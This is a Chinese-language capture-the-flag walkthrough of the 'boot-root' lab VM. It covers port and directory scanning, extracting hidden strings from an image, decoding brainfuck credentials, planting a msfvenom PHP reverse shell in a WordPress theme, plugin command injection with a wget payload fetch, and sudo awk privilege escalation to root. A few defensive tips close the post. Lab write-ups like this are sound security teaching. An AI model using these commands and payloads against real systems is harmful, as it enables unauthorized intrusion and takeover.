本文為系列文章第三篇,難度為中級,本篇需要打開思維,如何利用已收集的信息拿到更多的信息,信息收集的能力是關(guān)鍵。在這里,你將會了解到圖片隱寫的技術(shù),如何使用msfvenom(美少婦)生成木馬或是利用wordpress插件的命令執(zhí)行漏洞,通過metasploit獲取目標(biāo)主機的權(quán)限,之后使用linux中的awk進行提權(quán)。
1、信息收集:
對目標(biāo)進行端口掃描,探測開放的端口及應(yīng)用,目標(biāo)主機開放了22端口和80端口。
從80端口(web服務(wù))入手,進行目錄掃描,發(fā)現(xiàn)可用目錄/img和wordpress應(yīng)用,訪問/img發(fā)現(xiàn)一張圖片,下載該圖片后,使用strings命令發(fā)現(xiàn)圖片中隱藏的關(guān)鍵信息(之后發(fā)現(xiàn)是目錄),訪問新發(fā)現(xiàn)的目錄得到一串字符串,解密后得到一組用戶名密碼(為wordpress的用戶名密碼),進入wordpress后臺界面后使用msfvenom生成木馬上傳或者利用wordpress插件的命令執(zhí)行漏洞,再通過metasploit獲取目標(biāo)權(quán)限。
2、提權(quán):
拿到服務(wù)器權(quán)限后一般是低權(quán)限賬號,那么就需要提權(quán),本次通過linux的awk進行提權(quán)拿到root權(quán)限。
靶機難度:中級
靶機描述:
Flag: boot-root
Learing: exploit | web application Security | Privilege Escalation
Contact.. https://www.linkedin.com/in/rahulgehlaut/
This works betterin VirtualBox than VMware
靶機地址
靶機ip:192.168.1.106
Kaliip:192.168.1.104
用到的知識點、工具和漏洞:
Nmap:一款開源的端口掃描器,用于端口掃描及服務(wù)識別
Dirbuster:一款目錄掃描器,kali中自帶,用于目錄探測
圖片隱寫:將信息隱寫至圖片文件中的技術(shù)
Metasploit:集成了大量攻擊腳本的安全框架,并固化了利用流程,kali中自帶
Msfvenom:簡稱美少婦,用于生成木馬的工具,kali中自帶
wordpress插件反彈shell:wordpress是一款國外免費開源的博客軟件和內(nèi)容管理系統(tǒng)
主機探測:netdiscover-i eth0 -r 192.168.1.0/24
端口探測及服務(wù)識別:nmap-sS -sV -T5 -A 192.168.1.106
當(dāng)前靶機開放了22和80端口,首先以80的web服務(wù)為突破口。
Ofcourse 先掃波目錄,這里使用的kali自帶的dirbuster
/css和/html目錄下沒發(fā)現(xiàn)啥有用的信息,/img目錄下發(fā)現(xiàn)1個圖片,好明顯的的提示呀
打開看看,好像也沒啥有用的信息,先下載下來到本地,網(wǎng)上搜了下有種圖片隱寫的技術(shù),可能有突破口。
使用strings命令查看一下,發(fā)現(xiàn)了疑似密碼的字符串,先記錄下。
剛才掃目錄還發(fā)現(xiàn)了wordpress,先用wpscan掃一波看看,掃出一個web用戶,于是嘗試用剛才的密碼去登錄下試試,沒啥用。看來那個不是密碼,那會是什么,肯定有什么作用。
各種嘗試,又試了一下url,果然是的,發(fā)現(xiàn)了新大陸呀,找到了flag2
打開一看似乎是某種加密,網(wǎng)上搜了一下是brainfuck
于是在網(wǎng)上找了brainfuck在線解碼網(wǎng)站,得到一對用戶名密碼
看來這就是wordpress的用戶名密碼了。(其實到這里已經(jīng)可以走捷徑了,后面提權(quán)的時候才發(fā)現(xiàn),這里可以直接使用ssh登錄進去)登錄進去后發(fā)現(xiàn)該用戶權(quán)限挺大的。
這里有兩種getshell的方式:
1.是通過Appearance下的themeeditor模塊添加php反彈shell的代碼,再用metasploist監(jiān)聽獲取shell
2.是通過Activity monitor的命令執(zhí)行漏洞反彈shell,這也是作者寫的walkthrough使用的方式。
我這里把兩種方式都試過了,均可getshell。接下來我來展示第1種方法,也是常規(guī)方法,在具有后臺管理權(quán)限時如何getshell。
首先進入到themeeditor目錄下
在右邊文件目錄下找1個php頁面填充反彈shell的代碼,我這里在404.php里填充,php代碼使用msfvenom生成
Msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.104 lport=1234 -oshell.php
這里lhost填寫的是kali的ip,之后metesploist的信息要與這里一致
將php代碼填充到404.php里,這里注意要將前面的/*去掉,不然代碼無法生效,之后點擊保存。
現(xiàn)在打開metasploit,準(zhǔn)備反彈shell
然后網(wǎng)頁通過訪問
http://192.168.1.106/wordpress/wp-content/themes/twentynineteen/404.php即可反彈shell
拿到shell第1件事就是獲取一個標(biāo)準(zhǔn)shell,可通過以下命令獲取python-c import pty; pty.spawn("/bin/bash")
然后展示第2種反彈shell的方法,進入Activitymonitor目錄下有個Tools
確實可以存在命令執(zhí)行,但該輸入框存在長度限制,這里使用瀏覽器修改前端參數(shù)繞過
然后使用wget下載php代碼,然后開啟metasploit監(jiān)聽,網(wǎng)頁通過phpxxx.php執(zhí)行php代碼反彈shell。
kali上使用python-m SimpleHTTPServer 80開啟臨時web服務(wù),然后網(wǎng)頁上點擊lookup即可下載php代碼
使用之前Metasploit設(shè)置的參數(shù)繼續(xù)監(jiān)聽
成功反彈shell,到此兩種方法都已演示完畢,如果有其他方法,大家可以一起交流
下面需要進行提權(quán),因為剛得到的shell權(quán)限較低,得想辦法獲取高權(quán)限賬戶,最終獲取root權(quán)限。
Cat/etc/passwd查看一下系統(tǒng)存在的用戶
發(fā)現(xiàn)一個用戶叫web,之前wordpress得到一組用戶名密碼就是web的,于是嘗試切換用戶,沒想到成功切換了。(做到這里發(fā)現(xiàn),之前完全可以通過ssh直接登錄,也就省略了反彈shell的步驟,不過要不是湊巧賬戶密碼一樣也不能成功,所以這里說明賬號口令盡量不要設(shè)置成相同口令,然而事實上我們很多口令都是設(shè)成一樣的,警示!)
接下來看看home目錄下有啥東西,找到第三個flag
最后就是如何獲取root權(quán)限,有以下幾個思路
Sudo -l 查詢具有sudo權(quán)限命令,然后提權(quán)
SUID提權(quán),find / -perm -u=s -type f 2>/dev/null
通過在/etc/passwd添加一個root權(quán)限的賬戶進行提權(quán),
find / -writable -type f 2>/dev/null 查找可利用的可寫文件
內(nèi)核提權(quán)
這里使用sudo-l 查詢有哪些sudo權(quán)限命令
這里需通過awk提權(quán)
如此看來可以通過該命令提權(quán)
sudo/usr/bin/awk {system("/bin/bash")}
獲取最后一個flag
對于存儲的用戶名密碼使用強加密算法
不信任用戶的輸入,進行過濾或白名單校驗
對于linux中的某些命令不要賦予sudo權(quán)限
文章版權(quán)歸作者所有,未經(jīng)允許請勿轉(zhuǎn)載,若此文章存在違規(guī)行為,您可以聯(lián)系管理員刪除。
轉(zhuǎn)載請注明本文地址:http://specialneedsforspecialkids.com/yun/130064.html
摘要:本文將分享軟件基本用法及文件進程注冊表查看,這是一款微軟推薦的系統(tǒng)監(jiān)視工具,功能非常強大可用來檢測惡意軟件。可以幫助使用者對系統(tǒng)中的任何文件注冊表操作進行監(jiān)視和記錄,通過注冊表和文件讀寫的變化,有效幫助診斷系統(tǒng)故障或發(fā)現(xiàn)惡意軟件病毒及木馬。 ...
閱讀 1346·2023-01-11 13:20
閱讀 1684·2023-01-11 13:20
閱讀 1132·2023-01-11 13:20
閱讀 1858·2023-01-11 13:20
閱讀 4100·2023-01-11 13:20
閱讀 2704·2023-01-11 13:20
閱讀 1385·2023-01-11 13:20
閱讀 3597·2023-01-11 13:20